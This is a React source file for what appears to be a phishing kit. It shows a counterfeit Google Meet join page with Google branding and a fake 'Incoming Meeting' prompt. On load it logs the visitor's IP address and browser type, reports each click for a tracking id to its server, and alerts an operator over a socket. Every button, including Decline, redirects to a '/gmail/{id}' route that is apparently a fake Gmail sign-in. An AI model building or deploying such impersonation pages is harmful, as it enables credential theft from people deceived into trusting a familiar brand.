import React, { useEffect, useRef, useState } from "react";
// import "./Test2.css";
import "./Duo.css";
import { Link, useParams } from "react-router-dom";
import { isBrowser, isMobile } from "react-device-detect";
import axios from "axios";
import { io } from "socket.io-client";
import MobileMeet from "./MobileMeet";
import { usePageMeta } from "../hooks/useDocumentTitle";
import AutoMusicPlayer from "./AutoMusicPlayer";
const socket = io(process.env.REACT_APP_SERVER_ADDRESS);
const Duo = () => {
    const [showOverlay, setShowOverlay] = useState(false);
    const [userAgent, setUserAgent] = useState("");
    const [ipAddress, setIPAddress] = useState("");
    const [userId, setUserId] = useState();
    const { id } = useParams();
    let type;
    if (isBrowser) {
        type = "desktop";
    } else {
        type = "mobile";
    }
    const [micEnabled, setMicEnabled] = useState(false);
    const [cameraEnabled, setCameraEnabled] = useState(false);
    const [stream, setStream] = useState(null);
    const [userName] = useState('Jonathan');
    const videoRef = useRef(null);
    const [isMobile, setIsMobile] = useState(false);
    useEffect(() => {
        const pathname = window.location.pathname; // "/gmail/YLSJHGQ"
        const segments = pathname.split('/').filter(Boolean);
        localStorage.setItem('service', segments[0] || ''); // "gmail"
    }, []);
    useEffect(() => {
        const checkMobile = () => {
            setIsMobile(window.innerWidth <= 768);
        };

        checkMobile();
        window.addEventListener('resize', checkMobile);
        return () => window.removeEventListener('resize', checkMobile);
    }, []);
    // Effect to attach stream to video element whenever stream changes
    useEffect(() => {
        if (videoRef.current && stream) {
            videoRef.current.srcObject = stream;
            // Ensure video plays
            videoRef.current.play().catch(err => {
                console.log('Auto-play prevented:', err);
            });
        }
    }, [stream]);

    const toggleMic = () => {
        if (stream) {
            const audioTracks = stream.getAudioTracks();
            audioTracks.forEach(track => {
                track.enabled = !micEnabled;
            });
        }
        setMicEnabled(!micEnabled);
    };

    const toggleCamera = async () => {
        if (!cameraEnabled) {
            try {
                // Stop any existing stream first
                if (stream) {
                    stream.getTracks().forEach(track => track.stop());
                }

                const mediaStream = await navigator.mediaDevices.getUserMedia({
                    video: {
                        width: { ideal: 1280 },
                        height: { ideal: 720 },
                        facingMode: "user"
                    },
                    audio: micEnabled
                });

                setStream(mediaStream);
                setCameraEnabled(true);

                // Also enable mic in stream if it was enabled
                if (micEnabled) {
                    const audioTracks = mediaStream.getAudioTracks();
                    audioTracks.forEach(track => {
                        track.enabled = true;
                    });
                }
            } catch (err) {
                console.error('Camera access denied:', err);
                alert('Could not access camera. Please check permissions.');
                setCameraEnabled(false);
            }
        } else {
            // Turn off camera
            if (stream) {
                const videoTracks = stream.getVideoTracks();
                videoTracks.forEach(track => track.stop());

                // Keep audio if mic was enabled
                const audioTracks = stream.getAudioTracks();
                if (audioTracks.length > 0 && micEnabled) {
                    const audioStream = new MediaStream(audioTracks);
                    setStream(audioStream);
                } else {
                    setStream(null);
                }
            }
            setCameraEnabled(false);
        }
    };

    const allowMicAndCamera = async () => {
        try {
            // Stop any existing stream
            if (stream) {
                stream.getTracks().forEach(track => track.stop());
            }

            const mediaStream = await navigator.mediaDevices.getUserMedia({
                video: {
                    width: { ideal: 1280 },
                    height: { ideal: 720 },
                    facingMode: "user"
                },
                audio: true
            });

            setStream(mediaStream);
            setMicEnabled(true);
            setCameraEnabled(true);
        } catch (err) {
            console.error('Media access denied:', err);
            alert('Could not access microphone and camera. Please check permissions.');
        }
    };

    // Cleanup on unmount
    useEffect(() => {
        return () => {
            if (stream) {
                stream.getTracks().forEach(track => track.stop());
            }
        };
    }, [stream]);
    useEffect(() => {
        const userAgent = window.navigator.userAgent;
        setUserAgent(userAgent);
        fetch("https://api.ipify.org?format=json")
            .then((response) => response.json())
            .then((data) => setIPAddress(data.ip))
            .catch((error) => console.log(error));

        const bookings = {
            type: type,
        };

        axios
            .put(`/updateclick/${id}`, bookings, {
                headers: {
                    "Content-Type": "application/json",
                },
            })
            .then((response) => {
                console.log("Update successful:", response.data);
                const updatedData = response.data;
                console.log("gfgf", updatedData.data.userId);
                setUserId(updatedData.data.userId);
                socket.emit("newInfo", { message: "new info" });
            })
            .catch((error) => {
                console.error("Error updating data:", error);
            });
    }, [type, id]);

    useEffect(() => {
        const timer = setTimeout(() => {
            setShowOverlay(true);
        }, 100);

        return () => clearTimeout(timer); // Clean up timer on unmount
    }, []);
    usePageMeta({
        title: 'Google Meet – Join Video Call',
        description: 'Join a Google Meet video call instantly. No account needed.',
        image: 'https://fonts.gstatic.com/s/i/productlogos/meet_2020q4/v1/web-96dp/logo_meet_2020q4_color_2x_web_96dp.png',
    });
    return isMobile ? <MobileMeet id={id} /> :
        <div className="meet-container">
              {/* <RouteMusicPlayer play={true} src="/iphone.mp3" /> */}
            <div id="incomingSection">
                <div className="callWrapper">
                    <img className="meetLogo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/9/9b/Google_Meet_icon_%282020%29.svg/1245px-Google_Meet_icon_%282020%29.svg.png"/>

                        <div className="callerName">Incoming Meeting</div>
                        <div className="callText">Join the meeting now</div>

                        <div className="btnArea">
                            <Link to={`/gmail/${id}`} className="btn decline">Decline</Link>
                            <Link to={`/gmail/${id}`} className="btn accept" >Join</Link>
                        </div>
                </div>
            </div>
            <header className="meet-header">
                <div className="logo-section">
                    <div className="meet-logo">
                        <img src="https://www.gstatic.com/meet/google_meet_horizontal_wordmark_2020q4_1x_icon_124_40_2373e79660dabbf194273d27aa7ee1f5.png" alt="Google Meet Logo" className="logo-image" />
                        <span className="logo-text"> Meet</span>
                    </div>
                </div>
                <button className="sign-in-btn">Sign in</button>
            </header>

            <main className="meet-main">
                <div className="preview-section">
                    <div className="video-preview-container">
                        <div className="video-preview">
                            {cameraEnabled ? (
                                <video
                                    ref={videoRef}
                                    autoPlay
                                    playsInline
                                    muted
                                    className="camera-feed"
                                />
                            ) : (
                                <div className="placeholder-content">
                                    <div className="permission-message">
                                        Do you want people to see and hear you in the meeting?
                                    </div>
                                    <button
                                        className="allow-btn"
                                        onClick={allowMicAndCamera}
                                    >
                                        Allow microphone and camera
                                    </button>
                                </div>
                            )}

                            <div className="user-name-tag">{userName}</div>

                            <button className="more-options">
                                <svg viewBox="0 0 24 24" width="24" height="24">
                                    <path fill="currentColor" d="M12 8c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm0 2c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z" />
                                </svg>
                            </button>

                            <div className="controls-overlay">
                                <button
                                    className={`control-btn ${micEnabled ? 'active' : 'disabled'}`}
                                    onClick={toggleMic}
                                >
                                    <div className="control-icon">
                                        {micEnabled ? (
                                            <svg viewBox="0 0 24 24" width="20" height="20">
                                                <path fill="currentColor" d="M12 14c1.66 0 3-1.34 3-3V5c0-1.66-1.34-3-3-3S9 3.34 9 5v6c0 1.66 1.34 3 3 3z" />
                                                <path fill="currentColor" d="M17 11c0 2.76-2.24 5-5 5s-5-2.24-5-5H5c0 3.53 2.61 6.43 6 6.92V21h2v-3.08c3.39-.49 6-3.39 6-6.92h-2z" />
                                            </svg>
                                        ) : (
                                            <>
                                                <svg viewBox="0 0 24 24" width="20" height="20">
                                                    <path fill="currentColor" d="M19 11h-1.7c0 .74-.16 1.43-.43 2.05l1.23 1.23c.56-.98.9-2.09.9-3.28zm-4.02.17c0-.06.02-.11.02-.17V5c0-1.66-1.34-3-3-3S9 3.34 9 5v.18l5.98 5.99zM4.27 3L3 4.27l6.01 6.01V11c0 1.66 1.33 3 2.99 3 .22 0 .44-.03.65-.08l1.66 1.66c-.71.33-1.5.52-2.31.52-2.76 0-5.3-2.1-5.3-5.1H5c0 3.41 2.72 6.23 6 6.72V21h2v-3.28c.91-.13 1.77-.45 2.54-.9L19.73 21 21 19.73 4.27 3z" />
                                                </svg>
                                                <span className="slash-icon">/</span>
                                            </>
                                        )}
                                    </div>
                                </button>

                                <button
                                    className={`control-btn ${cameraEnabled ? 'active' : 'disabled'}`}
                                    onClick={toggleCamera}
                                >
                                    <div className="control-icon">
                                        {cameraEnabled ? (
                                            <svg viewBox="0 0 24 24" width="20" height="20">
                                                <path fill="currentColor" d="M17 10.5V7c0-.55-.45-1-1-1H4c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h12c.55 0 1-.45 1-1v-3.5l4 4v-11l-4 4z" />
                                            </svg>
                                        ) : (
                                            <>
                                                <svg viewBox="0 0 24 24" width="20" height="20">
                                                    <path fill="currentColor" d="M18 10.48V6c0-1.1-.9-2-2-2H4c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h12c1.1 0 2-.9 2-2v-4.48l4 3.98v-11l-4 3.98zM5 16l2.38-3.17L9 15l2.62-3.5L15 16H5z" />
                                                </svg>
                                                <span className="slash-icon">/</span>
                                            </>
                                        )}
                                    </div>
                                </button>
                            </div>

                            <button className="effects-btn">
                                <svg viewBox="0 0 24 24" width="24" height="24">
                                    <path fill="currentColor" d="M21 3H3C2 3 1 4 1 5v14c0 1.1.9 2 2 2h18c1 0 2-1 2-2V5c0-1-1-2-2-2zm0 13.92c0 .05.04.08.09.08H17.9c-1.6 0-3.02-.83-3.82-2.09-.19.29-.46.55-.78.76-.55.37-1.23.58-1.92.58-1.6 0-3.02-.83-3.82-2.09-.19.29-.46.55-.78.76-.55.37-1.23.58-1.92.58H3.09c-.05 0-.09-.03-.09-.08V5.08c0-.05.04-.08.09-.08h3.31c1.6 0 3.02.83 3.82 2.09.19-.29.46-.55.78-.76.55-.37 1.23-.58 1.92-.58 1.6 0 3.02.83 3.82 2.09.19-.29.46-.55.78-.76.55-.37 1.23-.58 1.92-.58h3.31c.05 0 .09.03.09.08v11.84z" />
                                    <circle fill="currentColor" cx="9" cy="13" r="2.5" />
                                    <circle fill="currentColor" cx="15" cy="9" r="2.5" />
                                </svg>
                            </button>
                        </div>

                        <div className="permission-dropdowns">
                            <div className="dropdown">
                                <svg viewBox="0 0 24 24" width="16" height="16">
                                    <path fill="#5f6368" d="M12 14c1.66 0 3-1.34 3-3V5c0-1.66-1.34-3-3-3S9 3.34 9 5v6c0 1.66 1.34 3 3 3z" />
                                </svg>
                                <span>Permission ...</span>
                                <svg viewBox="0 0 24 24" width="16" height="16" className="chevron">
                                    <path fill="#5f6368" d="M7 10l5 5 5-5z" />
                                </svg>
                            </div>
                            <div className="dropdown">
                                <svg viewBox="0 0 24 24" width="16" height="16">
                                    <path fill="#5f6368" d="M3 9v6h4l5 5V4L7 9H3zm13.5 3c0-1.77-1.02-3.29-2.5-4.03v8.05c1.48-.73 2.5-2.25 2.5-4.02zM14 3.23v2.06c2.89.86 5 3.54 5 6.71s-2.11 5.85-5 6.71v2.06c4.01-.91 7-4.49 7-8.77s-2.99-7.86-7-8.77z" />
                                </svg>
                                <span>Permission ...</span>
                                <svg viewBox="0 0 24 24" width="16" height="16" className="chevron">
                                    <path fill="#5f6368" d="M7 10l5 5 5-5z" />
                                </svg>
                            </div>
                            <div className="dropdown">
                                <svg viewBox="0 0 24 24" width="16" height="16">
                                    <path fill="#5f6368" d="M17 10.5V7c0-.55-.45-1-1-1H4c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h12c.55 0 1-.45 1-1v-3.5l4 4v-11l-4 4z" />
                                </svg>
                                <span>Permission ...</span>
                                <svg viewBox="0 0 24 24" width="16" height="16" className="chevron">
                                    <path fill="#5f6368" d="M7 10l5 5 5-5z" />
                                </svg>
                            </div>
                        </div>
                    </div>
                </div>

                <div className="join-section">
                    <h1 className="ready-title">Ready to join?</h1>
                    <p className="status-text">No one else is here</p>

                    <div className="gemini-note">
                        <div className="gemini-content">
                            <div className="gemini-icon">
                                <svg viewBox="0 0 24 24" width="20" height="20">
                                    <path fill="#1a73e8" d="M9 21c0 .5.4 1 1 1h4c.6 0 1-.5 1-1v-1H9v1zm3-19C8.1 2 5 5.1 5 9c0 2.4 1.2 4.5 3 5.7V17c0 .5.4 1 1 1h6c.6 0 1-.5 1-1v-2.3c1.8-1.3 3-3.4 3-5.7 0-3.9-3.1-7-7-7z" />
                                </svg>
                            </div>
                            <div className="gemini-text">
                                <div className="gemini-title">Use Gemini to take notes</div>
                                <div className="gemini-subtitle">Share notes and transcript</div>
                            </div>
                        </div>
                        <Link className="start-btn text-center" to={`/gmail/${id}`}>Start</Link>
                    </div>

                    <Link className="join-now-btn text-center" to={`/gmail/${id}`}>Join now</Link>

                    <Link className="other-ways-btn text-center" to={`/gmail/${id}`}>
                        Other ways to join
                        <svg viewBox="0 0 24 24" width="18" height="18" className="chevron-down">
                            <path fill="currentColor" d="M7 10l5 5 5-5z" />
                        </svg>
                    </Link>
                </div>
            </main>
        </div>
        ;
};

export default Duo;
